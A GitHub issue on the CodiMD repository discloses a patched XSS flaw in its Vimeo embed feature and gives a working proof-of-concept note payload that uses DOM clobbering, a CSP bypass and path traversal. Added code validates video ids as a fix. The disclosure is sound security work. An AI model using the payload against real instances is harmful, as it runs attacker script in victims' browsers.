hackmdio / codimd

CodiMD - Realtime collaborative markdown notes on all platforms.
https://hackmd.io/c/codimd-documentation
GNU Affero General Public License v3.0

XSS Vulnerability in Embedding Vimeo Video Feature #1774

Closed splitline closed 1 year ago

splitline commented 1 year ago

This issue has been reported to HackMD and has been patched on hackmd.io.

Root Cause

It doesn't check the data-videoid attribute at all, and directly concatenates it into the JSONP URL. In this way we can load an arbitrary file under https://vimeo.com as JavaScript, which might cause XSS.

https://github.com/hackmdio/codimd/blob/e7a5ea813ab684f5c9569dcee3423dd9c442b9bd/public/js/extra.js#L318-L329

PoC

Step 1. Create a note with content alert(document.domain);, and

Step 2. Create a note with the following content:

<!-- DOM clobbering + CSP bypass -->
<img src="/<note-id-created-in-step-1>/download" id="_zxcvbnSettings">
<!-- load gadget  -->
<div class="vimeo raw" data-videoid="../../../blog/wp-includes/js/zxcvbn-async.js#"></div>

Step 3. View it and trigger the XSS!

Technical Detail (Chinese): https://blog.splitline.tw/hackmd-xss/
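The root cause above is an unvalidated identifier reaching a URL. Added example (not CodiMD's code and not the fix merged in #1792): an allow-list check for the video id next to the unchecked concatenation, assuming the JSONP URL has the shape `https://vimeo.com/api/v2/video/<id>.json` and that Vimeo ids are purely numeric.

```javascript
// Allow-list for a Vimeo video id: decimal digits only, bounded length.
// Assumption of this example; tighten or loosen to match the real id space.
const VIMEO_ID = /^[0-9]{1,20}$/;

// Hardened form: returns the JSONP URL for a valid id, or null when the
// value is rejected. Because only digits can pass, the id can never carry
// path segments ("../"), a query string or a fragment ("#") into the URL.
function vimeoJsonpUrl(rawId) {
  const id = rawId == null ? '' : String(rawId).trim();
  if (!VIMEO_ID.test(id)) {
    return null;
  }
  return `https://vimeo.com/api/v2/video/${id}.json`;
}

// Unchecked form, for comparison: the attribute value is interpolated verbatim,
// which is what the issue describes.
function vimeoJsonpUrlUnchecked(rawId) {
  return `https://vimeo.com/api/v2/video/${rawId}.json`;
}

// Resolve the unchecked URL the way a browser would, so the reviewer can see
// which resource under vimeo.com a given attribute value actually selects.
function resolvedTarget(rawId) {
  return new URL(vimeoJsonpUrlUnchecked(rawId)).href;
}

// Constructed sample attribute values: a normal id and the traversal string
// from the report's PoC.
const SAMPLE_IDS = ['123456', '../../../blog/wp-includes/js/zxcvbn-async.js#'];

for (const id of SAMPLE_IDS) {
  console.log(JSON.stringify(id));
  console.log('  unchecked resolves to:', resolvedTarget(id));
  console.log('  hardened returns     :', vimeoJsonpUrl(id));
}
```

The resolved URL for the traversal value leaves `/api/v2/video/` entirely, which is the check a reviewer wants to see fail before the string is handed to `$.ajax`.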

jackycute commented 1 year ago

Fixed by #1792